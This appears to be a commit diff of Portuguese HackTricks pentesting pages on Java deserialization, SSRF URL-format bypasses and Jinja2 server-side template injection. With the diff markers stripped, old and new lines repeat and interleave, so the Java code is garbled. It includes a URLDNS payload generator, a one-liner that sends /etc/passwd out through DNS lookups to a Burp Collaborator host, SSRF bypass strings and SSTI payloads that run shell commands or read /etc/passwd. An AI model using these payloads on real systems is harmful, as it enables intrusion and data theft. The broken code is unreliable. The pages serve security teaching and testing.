Ele vai **executar** o `putVal` com cada valor dentro do `HashMap`. Mas, mais relevante é a chamada para `hash` com cada valor. Este é o código da função `hash`:
```java
static final int hash(Object key) {
int h;
return (key == null) ? 0 : (h = key.hashCode()) ^ (h >>> 16);
throws IOException, ClassNotFoundException {
[ ... ]
for (int i = 0; i < mappings; i++) {
[ ... ]
putVal(hash(key), key, value, false, false);
}
```
Como você pode observar, ao desserializar um `HashMap`, a função `hash` será executada com cada objeto e durante a execução do `hash`, o `.hashCode()` do objeto será executado. Portanto, se você desserializar um `HashMap` contendo um objeto `URL`, o objeto `URL` executará o `.hashCode()`.
A função vai **executar** `putVal` com cada valor dentro do `HashMap`. Mas, mais relevante é a chamada para `hash` com cada valor. Este é o código da função `hash`:
```java
static final int hash(Object key) {
int h;
return (key == null) ? 0 : (h = key.hashCode()) ^ (h >>> 16);
}
```
Como você pode observar, **ao deserializar** um **`HashMap`**, a função `hash` será **executada com cada objeto** e **durante** a execução do **`hash`**, **será executado `.hashCode()` do objeto**. Portanto, se você **deserializar** um **`HashMap`** **contendo** um objeto **URL**, o **objeto URL** irá **executar** `.hashCode()`.
Agora, vamos dar uma olhada no código de `URLObject.hashCode()`:
```java
public synchronized int hashCode() {
if (hashCode != -1)
return hashCode;
public synchronized int hashCode() {
if (hashCode != -1)
return hashCode;
hashCode = handler.hashCode(this);
return hashCode;
hashCode = handler.hashCode(this);
return hashCode;
```
Como você pode ver, quando um `URLObject` executa `.hashCode()`, é chamado `hashCode(this)`. A seguir, você pode ver o código desta função:
```java
protected int hashCode(URL u) {
int h = 0;
protected int hashCode(URL u) {
int h = 0;
// Generate the protocol part.
String protocol = u.getProtocol();
if (protocol != null)
h += protocol.hashCode();
// Generate the protocol part.
String protocol = u.getProtocol();
if (protocol != null)
h += protocol.hashCode();
// Generate the host part.
InetAddress addr = getHostAddress(u);
[ ... ]
// Generate the host part.
InetAddress addr = getHostAddress(u);
[ ... ]
```
Você pode ver que um `getHostAddress` é executado no domínio, **lançando uma consulta DNS**.
Você pode ver que um `getHostAddress` é executado no domínio, **iniciando uma consulta DNS**.
Portanto, essa classe pode ser **abusada** para **lançar** uma **consulta DNS** para **demonstrar** que a **desserialização** é possível, ou até mesmo para **exfiltrar informações** (você pode anexar como subdomínio a saída de uma execução de comando).
Portanto, esta classe pode ser **abusada** para **iniciar** uma **consulta DNS** para **demonstrar** que a **deserialização** é possível, ou até mesmo para **exfiltrar informações** (você pode anexar como subdomínio a saída de uma execução de comando).
### Exemplo de código de payload URLDNS
Você pode encontrar o [código de payload URLDNS do ysoserial aqui](https://github.com/frohoff/ysoserial/blob/master/src/main/java/ysoserial/payloads/URLDNS.java). No entanto, apenas para facilitar o entendimento de como codificá-lo, criei meu próprio PoC (com base no do ysoserial):
Você pode encontrar o [código de payload URDNS do ysoserial aqui](https://github.com/frohoff/ysoserial/blob/master/src/main/java/ysoserial/payloads/URLDNS.java). No entanto, apenas para facilitar o entendimento de como codificá-lo, criei meu próprio PoC (baseado no do ysoserial):
```java
import java.io.File;
import java.io.FileInputStream;
@ -85,123 +91,125 @@ import java.util.HashMap;
import java.net.URL;
public class URLDNS {
public static void GeneratePayload(Object instance, String file)
throws Exception {
//Serialize the constructed payload and write it to the file
File f = new File(file);
ObjectOutputStream out = new ObjectOutputStream(new FileOutputStream(f));
out.writeObject(instance);
out.flush();
out.close();
}
public static void payloadTest(String file) throws Exception {
//Read the written payload and deserialize it
ObjectInputStream in = new ObjectInputStream(new FileInputStream(file));
Object obj = in.readObject();
System.out.println(obj);
in.close();
}
public static void main(final String[] args) throws Exception {
String url = "http://3tx71wjbze3ihjqej2tjw7284zapye.burpcollaborator.net";
HashMap ht = new HashMap(); // HashMap that will contain the URL
URLStreamHandler handler = new SilentURLStreamHandler();
URL u = new URL(null, url, handler); // URL to use as the Key
ht.put(u, url); //The value can be anything that is Serializable, URL as the key is what triggers the DNS lookup.
public static void GeneratePayload(Object instance, String file)
throws Exception {
//Serialize the constructed payload and write it to the file
File f = new File(file);
ObjectOutputStream out = new ObjectOutputStream(new FileOutputStream(f));
out.writeObject(instance);
out.flush();
out.close();
}
public static void payloadTest(String file) throws Exception {
//Read the written payload and deserialize it
ObjectInputStream in = new ObjectInputStream(new FileInputStream(file));
Object obj = in.readObject();
System.out.println(obj);
in.close();
}
// During the put above, the URL's hashCode is calculated and cached.
// This resets that so the next time hashCode is called a DNS lookup will be triggered.
final Field field = u.getClass().getDeclaredField("hashCode");
field.setAccessible(true);
field.set(u, -1);
//Test the payloads
GeneratePayload(ht, "C:\\Users\\Public\\payload.serial");
}
public static void main(final String[] args) throws Exception {
String url = "http://3tx71wjbze3ihjqej2tjw7284zapye.burpcollaborator.net";
HashMap ht = new HashMap(); // HashMap that will contain the URL
URLStreamHandler handler = new SilentURLStreamHandler();
URL u = new URL(null, url, handler); // URL to use as the Key
ht.put(u, url); //The value can be anything that is Serializable, URL as the key is what triggers the DNS lookup.
// During the put above, the URL's hashCode is calculated and cached.
// This resets that so the next time hashCode is called a DNS lookup will be triggered.
final Field field = u.getClass().getDeclaredField("hashCode");
field.setAccessible(true);
field.set(u, -1);
//Test the payloads
GeneratePayload(ht, "C:\\Users\\Public\\payload.serial");
}
}
class SilentURLStreamHandler extends URLStreamHandler {
protected URLConnection openConnection(URL u) throws IOException {
return null;
}
protected URLConnection openConnection(URL u) throws IOException {
return null;
}
protected synchronized InetAddress getHostAddress(URL u) {
return null;
}
protected synchronized InetAddress getHostAddress(URL u) {
return null;
}
}
```
### Mais informações
* [https://blog.paranoidsoftware.com/triggering-a-dns-lookup-using-java-deserialization/](https://blog.paranoidsoftware.com/triggering-a-dns-lookup-using-java-deserialization/)
* Na ideia original, a carga útil de coleções comuns foi alterada para realizar uma consulta DNS, o que era menos confiável do que o método proposto, mas este é o post: [https://www.gosecure.net/blog/2017/03/22/detecting-deserialization-bugs-with-dns-exfiltration/](https://www.gosecure.net/blog/2017/03/22/detecting-deserialization-bugs-with-dns-exfiltration/)
* Na ideia original, o payload de commons collections foi alterado para realizar uma consulta DNS, isso foi menos confiável que o método proposto, mas este é o post: [https://www.gosecure.net/blog/2017/03/22/detecting-deserialization-bugs-with-dns-exfiltration/](https://www.gosecure.net/blog/2017/03/22/detecting-deserialization-bugs-with-dns-exfiltration/)
## GadgetProbe
Você pode baixar o [**GadgetProbe**](https://github.com/BishopFox/GadgetProbe) da Burp Suite App Store (Extender).
**GadgetProbe** tentará descobrir se algumas **classes Java existem** na classe Java do servidor para que você possa saber **se** ele é **vulnerável** a algum exploit conhecido.
**GadgetProbe** tentará descobrir se algumas **classes Java existem** na classe Java do servidor para que você possa saber **se** está **vulnerável** a algum exploit conhecido.
### Como funciona
**GadgetProbe** usará a mesma **carga útil DNS da seção anterior**, mas **antes** de executar a consulta DNS, ele tentará **desserializar uma classe arbitrária**. Se a **classe arbitrária existir**, a **consulta DNS** será **enviada** e o GadgProbe notará que essa classe existe. Se a **solicitação DNS não for enviada**, isso significa que a **classe arbitrária não foi desserializada** com sucesso, portanto, ela não está presente ou não é **serializável/exploitável**.
**GadgetProbe** usará o mesmo **payload DNS da seção anterior** mas **antes** de executar a consulta DNS, ele tentará **deserializar uma classe arbitrária**. Se a **classe arbitrária existir**, a **consulta DNS** será **enviada** e o GadgetProbe notará que esta classe existe. Se a **solicitação DNS** **nunca for enviada**, isso significa que a **classe arbitrária não foi deserializada** com sucesso, então ou ela não está presente ou **não é serializável/explorável**.
Dentro do github, [**GadgetProbe tem algumas listas de palavras**](https://github.com/BishopFox/GadgetProbe/tree/master/wordlists) com classes Java para serem testadas.
Dentro do github, [**GadgetProbe tem algumas wordlists**](https://github.com/BishopFox/GadgetProbe/tree/master/wordlists) com classes Java para serem testadas.
![](<../../.gitbook/assets/intruder4 (1) (1) (1).gif>)
### Mais informações
### Mais Informações
* [https://know.bishopfox.com/research/gadgetprobe](https://know.bishopfox.com/research/gadgetprobe)
## Scanner de desserialização Java
## Scanner de Deserialização Java
Este scanner pode ser **baixado** da Burp App Store (**Extender**).\
A **extensão** tem **capacidades** passivas e ativas.
A **extensão** possui **capacidades** passivas e ativas.
### Passivo
Por padrão, ele **verifica passivamente** todas as solicitações e respostas enviadas **procurando** por **bytes mágicos serializados Java** e apresentará um aviso de vulnerabilidade se algum for encontrado:
Por padrão, ele **verifica passivamente** todas as solicitações e respostas enviadas **procurando** por **bytes mágicos de serialização Java** e apresentará um aviso de vulnerabilidade se algum for encontrado:
![](<../../.gitbook/assets/image (290).png>)
### Ativo
**Teste manual**
**Teste Manual**
Você pode selecionar uma solicitação, clicar com o botão direito e `Enviar solicitação para DS - Teste manual`.\
Em seguida, dentro da guia _Deserialization Scanner_ --> guia _Teste manual_, você pode selecionar o **ponto de inserção**. E **iniciar o teste** (selecione o ataque apropriado dependendo da codificação usada).
Você pode selecionar uma solicitação, clicar com o botão direito e `Enviar solicitação para DS - Teste Manual`.\
Então, dentro da _Aba Scanner de Deserialização_ --> _Aba de teste manual_ você pode selecionar o **ponto de inserção**. E **iniciar o teste** (Selecione o ataque apropriado dependendo da codificação usada).
![](../../.gitbook/assets/3-1.png)
Mesmo que isso seja chamado de "teste manual", é bastante **automatizado**. Ele verificará automaticamente se a **desserialização** é **vulnerável** a **qualquer carga útil ysoserial** verificando as bibliotecas presentes no servidor da web e destacará as vulneráveis. Para **verificar** as **bibliotecas vulneráveis**, você pode selecionar para lançar **Javas Sleeps**, **sleeps** via **consumo de CPU** ou usando **DNS**, como mencionado anteriormente.
Mesmo sendo chamado de "Teste Manual", é bastante **automatizado**. Ele verificará automaticamente se a **deserialização** é **vulnerável** a **qualquer payload ysoserial** verificando as bibliotecas presentes no servidor web e destacará as vulneráveis. Para **verificar** as **bibliotecas vulneráveis** você pode escolher lançar **Javas Sleeps**, **sleeps** via **consumo de CPU**, ou usando **DNS** como já foi mencionado anteriormente.
**Explorando**
Depois de identificar uma biblioteca vulnerável, você pode enviar a solicitação para a guia _Explorando_.\
Nesta guia, você deve **selecionar** o **ponto de injeção** novamente, escrever a **biblioteca vulnerável** para a qual deseja criar uma carga útil e o **comando**. Em seguida, basta pressionar o botão de **Ataque** apropriado.
Uma vez que você identificou uma biblioteca vulnerável, você pode enviar a solicitação para a _Aba de Exploração_.\
Nesta aba, você tem que **selecionar** o **ponto de injeção** novamente, e **escrever** a **biblioteca vulnerável** para a qual deseja criar um payload, e o **comando**. Então, basta pressionar o botão de **Ataque** apropriado.
![](<../../.gitbook/assets/4 (1).png>)
### Informações de exfiltração DNS de desserialização Java
### Informações sobre Exfil DNS de Deserialização Java
Faça sua carga útil executar algo como o seguinte:
Faça seu payload executar algo como o seguinte:
```bash
(i=0;tar zcf - /etc/passwd | xxd -p -c 31 | while read line; do host $line.$i.cl1k22spvdzcxdenxt5onx5id9je73.burpcollaborator.net;i=$((i+1)); done)
```
### Mais Informações
* [https://techblog.mediaservice.net/2017/05/descoberta-e-exploracao-confiaveis-de-vulnerabilidades-de-deserializacao-java/](https://techblog.mediaservice.net/2017/05/descoberta-e-exploracao-confiaveis-de-vulnerabilidades-de-deserializacao-java/)
* [https://techblog.mediaservice.net/2017/05/reliable-discovery-and-exploitation-of-java-deserialization-vulnerabilities/](https://techblog.mediaservice.net/2017/05/reliable-discovery-and-exploitation-of-java-deserialization-vulnerabilities/)
<details>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
<summary><strong>Aprenda hacking em AWS do zero ao herói com</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
* Você trabalha em uma **empresa de segurança cibernética**? Você quer ver sua **empresa anunciada no HackTricks**? ou você quer ter acesso à **última versão do PEASS ou baixar o HackTricks em PDF**? Verifique os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
* Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family)
* Adquira o [**swag oficial do PEASS & HackTricks**](https://peass.creator-spring.com)
* **Junte-se ao** [**💬**](https://emojipedia.org/speech-balloon/) [**grupo Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo telegram**](https://t.me/peass) ou **siga-me** no **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **Compartilhe suas técnicas de hacking enviando PRs para o** [**repositório hacktricks**](https://github.com/carlospolop/hacktricks) **e** [**repositório hacktricks-cloud**](https://github.com/carlospolop/hacktricks-cloud).
Outras formas de apoiar o HackTricks:
* Se você quer ver sua **empresa anunciada no HackTricks** ou **baixar o HackTricks em PDF** Confira os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
* Adquira o [**material oficial PEASS & HackTricks**](https://peass.creator-spring.com)
* Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção de [**NFTs**](https://opensea.io/collection/the-peass-family) exclusivos
* **Junte-se ao grupo** 💬 [**Discord**](https://discord.gg/hRep4RUj7f) ou ao grupo [**telegram**](https://t.me/peass) ou **siga**-me no **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
* **Compartilhe suas técnicas de hacking enviando PRs para os repositórios github** [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud).
</details>

64
pentesting-web/ssrf-server-side-request-forgery/url-format-bypass.md
View file

@ -2,19 +2,21 @@
<details>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
<summary><strong>Aprenda hacking em AWS do zero ao herói com</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
* Você trabalha em uma **empresa de segurança cibernética**? Você quer ver sua **empresa anunciada no HackTricks**? ou você quer ter acesso à **última versão do PEASS ou baixar o HackTricks em PDF**? Verifique os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
* Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family)
* Adquira o [**swag oficial do PEASS & HackTricks**](https://peass.creator-spring.com)
* **Junte-se ao** [**💬**](https://emojipedia.org/speech-balloon/) [**grupo Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo telegram**](https://t.me/peass) ou **siga-me** no **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **Compartilhe seus truques de hacking enviando PRs para o** [**repositório hacktricks**](https://github.com/carlospolop/hacktricks) **e** [**repositório hacktricks-cloud**](https://github.com/carlospolop/hacktricks-cloud).
Outras formas de apoiar o HackTricks:
* Se você quer ver sua **empresa anunciada no HackTricks** ou **baixar o HackTricks em PDF**, confira os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
* Adquira o [**material oficial PEASS & HackTricks**](https://peass.creator-spring.com)
* Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção de [**NFTs**](https://opensea.io/collection/the-peass-family) exclusivos
* **Junte-se ao grupo do** 💬 [**Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo do telegram**](https://t.me/peass) ou **siga-me** no **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
* **Compartilhe suas técnicas de hacking enviando PRs para os repositórios do GitHub** [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud).
</details>
<figure><img src="/.gitbook/assets/image (675).png" alt=""><figcaption></figcaption></figure>
Encontre vulnerabilidades que são mais importantes para que você possa corrigi-las mais rapidamente. O Intruder rastreia sua superfície de ataque, executa varreduras proativas de ameaças, encontra problemas em toda a sua pilha de tecnologia, desde APIs até aplicativos da web e sistemas em nuvem. [**Experimente gratuitamente**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks) hoje.
Encontre vulnerabilidades que importam mais para que você possa corrigi-las mais rapidamente. O Intruder rastreia sua superfície de ataque, executa varreduras proativas de ameaças, encontra problemas em toda a sua pilha tecnológica, de APIs a aplicativos web e sistemas em nuvem. [**Experimente gratuitamente**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks) hoje.
{% embed url="https://www.intruder.io/?utm_campaign=hacktricks&utm_source=referral" %}
@ -89,7 +91,9 @@ http://bugbounty.dod.network = 127.0.0.2 (localhost)
1ynrnhl.xip.io == 169.254.169.254
spoofed.burpcollaborator.net = 127.0.0.1
```
O **Burp extension** [**Burp-Encode-IP**](https://github.com/e1abrador/Burp-Encode-IP) implementa bypasses de formatação de IP.
![](<../../.gitbook/assets/image (649) (1) (1).png>)
A **extensão Burp** [**Burp-Encode-IP**](https://github.com/e1abrador/Burp-Encode-IP) implementa bypasses de formatação de IP.
### Analisador de Domínio
```bash
@ -121,16 +125,6 @@ attacker。com
ⓣ ⓤ ⓥ ⓦ ⓧ ⓨ ⓩ ⓪ ⓫ ⓬ ⓭ ⓮ ⓯ ⓰ ⓱ ⓲ ⓳ ⓴ ⓵ ⓶ ⓷ ⓸ ⓹ ⓺ ⓻ ⓼ ⓽ ⓾ ⓿
```
### Confusão de Domínio
Domain confusion is a technique used in Server-Side Request Forgery (SSRF) attacks to bypass URL-based filters. It involves manipulating the URL format to deceive the server into making unintended requests.
A common method of implementing domain confusion is by using look-alike characters or homoglyphs. These are characters that visually resemble other characters but have different Unicode representations. By replacing certain characters in the URL with their look-alike counterparts, an attacker can trick the server into sending requests to a different domain than intended.
For example, the attacker could replace the letter "o" in the domain name with the number "0" or the Cyrillic letter "о". This can lead to the server making requests to a malicious domain that the attacker controls.
To prevent domain confusion attacks, it is important to implement proper input validation and sanitization techniques. This includes validating and normalizing user input, as well as using whitelisting or strict input filtering to only allow specific characters in URLs.
By being aware of domain confusion and implementing appropriate security measures, developers can protect their applications from SSRF attacks that exploit URL format bypass vulnerabilities.
```bash
# Try also to change attacker.com for 127.0.0.1 to try to access localhost
# Try replacing https by http
@ -165,9 +159,9 @@ http://1.1.1.1 &@2.2.2.2# @3.3.3.3/
#Parameter pollution
next={domain}&next=attacker.com
```
### Bypass de Caminhos e Extensões
### Caminhos e Extensões para Bypass
Se for necessário que a URL termine em um caminho ou uma extensão, ou que contenha um caminho, você pode tentar um dos seguintes bypasses:
Se for necessário que a URL termine com um caminho ou uma extensão, ou deve conter um caminho, você pode tentar um dos seguintes bypasses:
```
https://metadata/vulerable/path#/expected/path
https://metadata/vulerable/path#.extension
@ -179,8 +173,8 @@ A ferramenta [**recollapse**](https://github.com/0xacb/recollapse) pode gerar va
### Bypass via redirecionamento
É possível que o servidor esteja **filtrando a requisição original** de um SSRF, **mas não** uma possível resposta de **redirecionamento** para essa requisição.\
Por exemplo, um servidor vulnerável a SSRF através de: `url=https://www.google.com/` pode estar **filtrando o parâmetro url**. Mas se você usar um [servidor python para responder com um 302](https://pastebin.com/raw/ywAUhFrv) para o local onde você deseja redirecionar, você pode ser capaz de **acessar endereços IP filtrados** como 127.0.0.1 ou até mesmo **protocolos filtrados** como gopher.\
É possível que o servidor esteja **filtrando a solicitação original** de um SSRF **mas não** uma possível resposta de **redirecionamento** para essa solicitação.\
Por exemplo, um servidor vulnerável a SSRF via: `url=https://www.google.com/` pode estar **filtrando o parâmetro url**. Mas se você usar um [servidor python para responder com um 302](https://pastebin.com/raw/ywAUhFrv) para o local onde deseja redirecionar, você pode ser capaz de **acessar endereços IP filtrados** como 127.0.0.1 ou até mesmo **protocolos filtrados** como gopher.\
[Confira este relatório.](https://sirleeroyjenkins.medium.com/just-gopher-it-escalating-a-blind-ssrf-to-rce-for-15k-f5329a974530)
```python
#!/usr/bin/env python3
@ -202,15 +196,15 @@ self.end_headers()
HTTPServer(("", int(sys.argv[1])), Redirect).serve_forever()
```
## Truques Explicados
## Técnicas Explicadas
### Truque da Barra Invertida
### Truque do Backslash
Em resumo, o _truque da barra invertida_ se baseia na exploração de uma pequena diferença entre duas especificações de "URL": o [WHATWG URL Standard](https://url.spec.whatwg.org/#url-parsing) e o [RFC3986](https://datatracker.ietf.org/doc/html/rfc3986#appendix-B). O RFC3986 é uma especificação genérica e multiuso para a sintaxe de _Uniform Resource Identifiers_ (Identificadores de Recursos Uniformes), enquanto o WHATWG URL Standard é especificamente voltado para a Web e para URLs (que são um subconjunto de URIs). Navegadores modernos implementam o WHATWG URL Standard.
Resumidamente, o _truque do backslash_ se baseia em explorar uma pequena diferença entre duas especificações de "URL": a [WHATWG URL Standard](https://url.spec.whatwg.org/#url-parsing) e a [RFC3986](https://datatracker.ietf.org/doc/html/rfc3986#appendix-B). A RFC3986 é uma especificação genérica e multipropósito para a sintaxe de _Identificadores de Recursos Uniformes (URIs)_, enquanto a WHATWG URL Standard é especificamente voltada para a Web e para URLs (que são um subconjunto de URIs). Navegadores modernos implementam a WHATWG URL Standard.
Ambas as especificações descrevem uma maneira de analisar URI/URLs, com uma pequena diferença. A especificação WHATWG descreve [um caractere extra](https://url.spec.whatwg.org/#authority-state), a `\`, que se comporta exatamente como `/`: encerra o nome do host e a autoridade e inicia o caminho da URL.
Ambas descrevem uma maneira de analisar URIs/URLs, com uma pequena diferença. A especificação da WHATWG descreve [um caractere extra](https://url.spec.whatwg.org/#authority-state), o `\`, que se comporta exatamente como `/`: termina o nome do host e a autoridade e inicia o caminho da URL.
![As duas especificações analisando a mesma URL de forma diferente](https://bugs.xdavidhu.me/assets/posts/2021-12-30-fixing-the-unfixable-story-of-a-google-cloud-ssrf/spec\_difference.jpg)
![As duas especificações analisam a mesma URL de maneira diferente](https://bugs.xdavidhu.me/assets/posts/2021-12-30-fixing-the-unfixable-story-of-a-google-cloud-ssrf/spec\_difference.jpg)
### Outras Confusões
@ -221,19 +215,21 @@ imagem de [https://claroty.com/2022/01/10/blog-research-exploiting-url-parsing-c
<figure><img src="/.gitbook/assets/image (675).png" alt=""><figcaption></figcaption></figure>
Encontre as vulnerabilidades que mais importam para que você possa corrigi-las mais rapidamente. O Intruder rastreia sua superfície de ataque, executa varreduras proativas de ameaças, encontra problemas em toda a sua pilha de tecnologia, desde APIs até aplicativos da web e sistemas em nuvem. [**Experimente gratuitamente**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks) hoje.
Encontre vulnerabilidades que importam mais para que você possa corrigi-las mais rapidamente. Intruder rastreia sua superfície de ataque, executa varreduras proativas de ameaças, encontra problemas em toda a sua pilha tecnológica, de APIs a aplicativos web e sistemas em nuvem. [**Experimente gratuitamente**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks) hoje.
{% embed url="https://www.intruder.io/?utm_campaign=hacktricks&utm_source=referral" %}
<details>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
<summary><strong>Aprenda hacking no AWS do zero ao herói com</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
* Você trabalha em uma **empresa de cibersegurança**? Gostaria de ver sua **empresa anunciada no HackTricks**? Ou gostaria de ter acesso à **versão mais recente do PEASS ou baixar o HackTricks em PDF**? Confira os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
* Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family)
* Adquira o [**swag oficial do PEASS & HackTricks**](https://peass.creator-spring.com)
* **Junte-se ao** [**💬**](https://emojipedia.org/speech-balloon/) [**grupo Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo Telegram**](https://t.me/peass) ou **siga-me** no **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **Compartilhe seus truques de hacking enviando PRs para o** [**repositório hacktricks**](https://github.com/carlospolop/hacktricks) **e para o** [**repositório hacktricks-cloud**](https://github.com/carlospolop/hacktricks-cloud).
Outras maneiras de apoiar o HackTricks:
* Se você quiser ver sua **empresa anunciada no HackTricks** ou **baixar o HackTricks em PDF**, confira os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
* Adquira o [**material oficial PEASS & HackTricks**](https://peass.creator-spring.com)
* Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção de [**NFTs**](https://opensea.io/collection/the-peass-family) exclusivos
* **Junte-se ao grupo** 💬 [**Discord**](https://discord.gg/hRep4RUj7f) ou ao grupo [**telegram**](https://t.me/peass) ou **siga-me** no **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
* **Compartilhe suas técnicas de hacking enviando PRs para os repositórios do GitHub** [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud).
</details>

570
pentesting-web/ssti-server-side-template-injection/README.md
View file

File diff suppressed because it is too large Load diff

231
pentesting-web/ssti-server-side-template-injection/jinja2-ssti.md
View file

@ -1,91 +1,20 @@
# Jinja2 SSTI
### **Laboratório**
<details>
#### **Explicação**
<summary><strong>Aprenda hacking no AWS do zero ao herói com</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
O SSTI (Server-Side Template Injection) é uma vulnerabilidade que ocorre quando um aplicativo da web permite que o usuário insira modelos de servidor que são executados sem validação adequada. Isso pode permitir que um invasor execute código arbitrário no servidor.
Outras formas de apoiar o HackTricks:
O Jinja2 é um mecanismo de modelo popular usado em muitos aplicativos da web Python. Ele é usado para renderizar modelos de servidor e pode ser vulnerável a SSTI se não for usado corretamente.
* Se você quer ver sua **empresa anunciada no HackTricks** ou **baixar o HackTricks em PDF**, confira os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
* Adquira o [**material oficial PEASS & HackTricks**](https://peass.creator-spring.com)
* Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção de [**NFTs**](https://opensea.io/collection/the-peass-family) exclusivos
* **Junte-se ao grupo** 💬 [**Discord**](https://discord.gg/hRep4RUj7f) ou ao grupo [**telegram**](https://t.me/peass) ou **siga-me** no **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
* **Compartilhe suas técnicas de hacking enviando PRs para os repositórios github do** [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud).
#### **Exemplo**
Para demonstrar como o SSTI pode ser explorado em um aplicativo da web que usa o Jinja2, vamos usar o seguinte exemplo:
```python
from flask import Flask, request, render_template_string
app = Flask(__name__)
@app.route('/')
def index():
name = request.args.get('name', 'World')
template = 'Hello {{name}}!'
return render_template_string(template, name=name)
if __name__ == '__main__':
app.run()
```
Este aplicativo da web usa o Flask e o Jinja2 para renderizar um modelo de servidor simples que exibe uma mensagem de saudação personalizada. O nome é passado como um parâmetro de consulta na URL.
No entanto, este aplicativo da web é vulnerável a SSTI porque não valida adequadamente o modelo de servidor fornecido pelo usuário. Isso significa que um invasor pode injetar código arbitrário no modelo de servidor e executá-lo no servidor.
Por exemplo, um invasor pode injetar o seguinte modelo de servidor:
```
{{config.items()}}
```
Isso exibirá todas as configurações do aplicativo da web, incluindo informações confidenciais, como chaves secretas e senhas.
#### **Exploração**
Para explorar essa vulnerabilidade, podemos usar o modelo de servidor injetado para exibir informações confidenciais ou executar código arbitrário no servidor.
Por exemplo, podemos injetar o seguinte modelo de servidor:
```
<div data-gb-custom-block data-tag="for">
<div data-gb-custom-block data-tag="if" data-0='catch_warnings'>
<div data-gb-custom-block data-tag="for">
<div data-gb-custom-block data-tag="if">
<div data-gb-custom-block data-tag="if" data-0='eval'>
{{ b['eval']('__import__("os").popen("id").read()') }}
</div>
</div>
</div>
</div>
</div>
```
Este modelo de servidor usa a classe `catch_warnings` para acessar o dicionário global do Python e executar o comando `id` do sistema operacional. Isso exibirá o ID do usuário atual no servidor.
Outro exemplo de exploração é injetar o seguinte modelo de servidor:
```
{{ ''.__class__.__mro__[2].__subclasses__()[40]('/etc/passwd').read() }}
```
